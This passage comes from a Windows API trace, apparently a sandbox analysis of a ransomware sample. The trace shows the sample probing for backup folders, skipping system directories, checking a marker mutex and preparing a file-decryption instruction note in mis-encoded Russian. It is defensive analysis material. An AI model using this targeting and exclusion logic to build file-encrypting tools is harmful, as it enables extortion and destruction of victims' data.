") returned 7 [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, 
cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0109.076] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Archive", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18㪔X\x18\x81")) returned 0xffffffff [0109.076] GetLastError () returned 0x2 [0109.076] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.076] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0109.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Backup", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@麌W企@\x18㩄X\x18\x88")) 
returned 0xffffffff [0109.077] GetLastError () returned 0x2 [0109.077] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="backup㪐X ") returned 6 [0109.077] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0109.077] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Reserv", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@鰄W企@\x18㪔X\x18\x8f")) returned 0xffffffff [0109.077] GetLastError () returned 0x2 [0109.077] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="reserv㩀X ") returned 6 [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0109.078] 
FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Restore", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18㩄X\x18\x97")) returned 0xffffffff [0109.078] GetLastError () returned 0x2 [0109.078] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.078] GlobalLock (hMem=0x450004) returned 0x591988 [0109.078] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.078] GlobalUnlock (hMem=0x450004) returned 0 [0109.078] GlobalLock (hMem=0x450004) returned 0x591988 [0109.078] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.079] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.079] GlobalUnlock (hMem=0x450004) returned 0 [0109.079] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.079] GlobalUnlock (hMem=0x45000c) returned 0 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0109.080] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.080] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js 
halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0109.080] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.080] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.080] GlobalUnlock (hMem=0x45000c) returned 0 [0109.080] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.080] GlobalLock (hMem=0x450004) returned 0x593998 [0109.080] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.080] GlobalUnlock (hMem=0x45000c) returned 0 [0109.080] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.080] GlobalUnlock (hMem=0x450004) returned 0 [0109.080] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=11, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact 
Edition\\") returned 9 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=10, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=8, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0109.084] CharLowerBuffW (in: 
lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] SHGetMalloc (in: ppMalloc=0x18ea8c | out: ppMalloc=0x18ea8c*=0x767666bc) returned 0x0 [0109.085] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18ea88 | out: ppidl=0x18ea88) returned 0x0 [0109.085] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.086] SysReAllocStringLen (in: pbstr=0x18eb10*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18eb10*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.086] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.086] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.086] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.086] GlobalLock (hMem=0x450004) returned 0x591988 [0109.086] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.086] GlobalUnlock (hMem=0x450004) returned 0 [0109.087] GlobalLock (hMem=0x450004) returned 0x591988 [0109.087] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.087] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.087] GlobalUnlock (hMem=0x450004) returned 0 [0109.087] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.087] GlobalUnlock (hMem=0x45000c) returned 0 [0109.087] 
FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b060 [0109.087] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.087] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0109.087] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea88 | out: lpLocalFileTime=0x18ea88) returned 1 [0109.087] FileTimeToDosDateTime (in: lpFileTime=0x18ea88, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.087] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.087] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.087] 
GlobalUnlock (hMem=0x45000c) returned 0 [0109.087] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.087] GlobalLock (hMem=0x450004) returned 0x5949a0 [0109.087] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.087] GlobalUnlock (hMem=0x45000c) returned 0 [0109.088] GlobalHandle (pMem=0x5949a0) returned 0x450004 [0109.088] GlobalUnlock (hMem=0x450004) returned 0 [0109.088] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.088] CharLowerBuffW (in: lpsz="EEINTL.DLL", cchLength=0xa | out: lpsz="eeintl.dll") returned 0xa [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18da24, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", cchWideChar=71, lpMultiByteStr=0x18da00, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpUsedDefaultChar=0x0) returned 71 [0109.088] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18da24, cbMultiByte=4095, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\EQUATION\\1033\\EEINTL.DLL", lpUsedDefaultChar=0x0) returned 4 [0109.089] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0109.089] GetLastError () returned 0x12 [0109.089] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.089] GlobalLock (hMem=0x450004) returned 0x591988 [0109.089] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.089] GlobalUnlock (hMem=0x450004) returned 0 [0109.089] GlobalLock (hMem=0x450004) returned 0x591988 [0109.089] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.089] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.089] GlobalUnlock (hMem=0x450004) returned 0 [0109.089] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.089] GlobalUnlock (hMem=0x45000c) returned 0 [0109.089] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b060 [0109.089] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea88 | out: lpLocalFileTime=0x18ea88) returned 1 [0109.089] FileTimeToDosDateTime (in: 
lpFileTime=0x18ea88, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.090] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.090] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.090] GlobalUnlock (hMem=0x45000c) returned 0 [0109.090] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.090] GlobalLock (hMem=0x450004) returned 0x593998 [0109.090] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.090] GlobalUnlock (hMem=0x45000c) returned 0 [0109.090] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.090] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.090] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea84 | out: lpLocalFileTime=0x18ea84) returned 1 [0109.090] FileTimeToDosDateTime (in: lpFileTime=0x18ea84, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.090] GlobalLock (hMem=0x450004) returned 0x592990 [0109.090] GlobalHandle (pMem=0x592990) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] GlobalLock (hMem=0x450004) returned 0x592990 [0109.090] GlobalLock (hMem=0x45000c) returned 0x5949a0 [0109.090] GlobalHandle (pMem=0x592990) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] GlobalHandle (pMem=0x5949a0) returned 0x45000c [0109.090] GlobalUnlock 
(hMem=0x45000c) returned 0 [0109.090] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.090] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0109.091] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea84 | out: lpLocalFileTime=0x18ea84) returned 1 [0109.091] FileTimeToDosDateTime (in: lpFileTime=0x18ea84, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.091] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.091] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.091] GlobalUnlock (hMem=0x45000c) returned 0 [0109.091] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.091] GlobalLock (hMem=0x450004) returned 0x5949a0 [0109.091] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.091] GlobalUnlock (hMem=0x45000c) returned 0 [0109.091] GlobalHandle (pMem=0x5949a0) returned 0x450004 [0109.091] GlobalUnlock (hMem=0x450004) returned 0 [0109.091] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 